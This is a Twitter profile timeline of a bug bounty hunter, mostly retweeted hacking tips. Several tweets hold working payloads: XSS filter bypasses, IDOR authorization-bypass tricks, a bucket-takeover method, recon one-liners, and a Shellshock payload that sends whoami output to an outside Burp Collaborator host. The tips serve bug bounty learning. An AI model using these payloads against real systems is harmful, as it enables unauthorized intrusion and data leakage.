Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @rajesh_ranjan4
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @rajesh_ranjan4
-
Prikvačeni tweet
Purchased a ticket for
#nullcon2020 with my first bounty. Thanks to@Bugcrowdpic.twitter.com/hZsYOveUwq
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumarhttps://link.medium.com/sC7JJUxgG3
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
Still after all these years my favourite XSS payload is: <iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`>
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
#WeRiseByLiftingOthers bypass alert filter: (alert)(1) a=alert,a(2) [3].find(alert) al\u0065rt(4) alert`5` [6].map(alert) [7].every(alert) [8].filter(alert) [9].findIndex(alert) [10].forEach(alert) self['alert'](11) parent['alert'](12) window['alert'](13)Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently: dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'pic.twitter.com/RjRzccus5J
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
-API TIP:26/31- Looking for BOLA (IDOR) in APIs? got 401/403 errors? AuthZ bypass tricks: * Wrap ID with an array {“id”:111} --> {“id”:[111]} * JSON wrap {“id”:111} --> {“id”:{“id”:111}} * Send ID twice URL?id=<LEGIT>&id=<VICTIM> * Send wildcard {"user_id":"*"}
#bugbountytipsPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
http://Reverb.com disclosed a bug submitted by muon4: https://hackerone.com/reports/759247 - Bounty: $1,500
#hackerone#bugbountypic.twitter.com/yYdQMQyJ1l
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
Digital Ocean Bucket Takeover:- format: bucketname[.]region[.]digitaloceanspaces[.]com In Console:- Create Space, type the bucket name, make it public :) How to find? site:github[.]com intext:digitaloceanspaces[.]com
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
I just completed
@Pentesterlab's Essential Badge!!!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
1 liner to get a list of all *.mil sites for DeptOfDefense's program on
@Hacker0x01 crtsh %.mil | rev | cut -d "." -f 1,2 | rev | sort -u | tee -a ~/recondata/milsite.txt | grep -v "\@"Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Rajesh Ranjan proslijedio/la je Tweet
I just released some of my PoCs! IDOR: https://youtu.be/3hJaxmiSzO4 Stored XSS: https://youtu.be/pwLG7tAGO08 Stored XSS: https://youtu.be/fnW0w2VYT2I RXSS: https://youtu.be/IC43MzAkC7E RXSS: https://youtu.be/DZxMB_KOoMk RXSS: https://youtu.be/L5isQP28o3M RXSS: https://youtu.be/CaoAh2CXyr0
#GeneralEG#BugBountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
I just published "Hunting Good Bugs with only <HTML>" https://link.medium.com/oTrMsKEM72
#bugbounty#infosec I hope you enjoy this post!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I just completed
@Pentesterlab's Unix Badge!!!Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
Blind SSRF with Shellshock exploitation payload: () { :; }; /usr/bin/nslookup $(whoami).tgdgspp0ee8bwyqtkrwumkotrkxalz.burpcollaborator.net
pic.twitter.com/JM9Y4ogMw9
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
Bypass SameSite Cookies Default to Lax and get CSRFhttps://medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
I never share such bugs but this is however unique and had a good impact please do share .
#bugbounty#infosechttps://medium.com/@pratiky054/html-injection-unique-exploitation-a5c3d4e6fed8 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Rajesh Ranjan proslijedio/la je Tweet
XXE Attacks:- Part 1:- XML Basics:- https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 … Part 2:- XML DTD related Attacks:- https://medium.com/@klose7/xxe-attacks-part-2-xml-dtd-related-attacks-a572e8deb478 …pic.twitter.com/qt508UBqsD
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
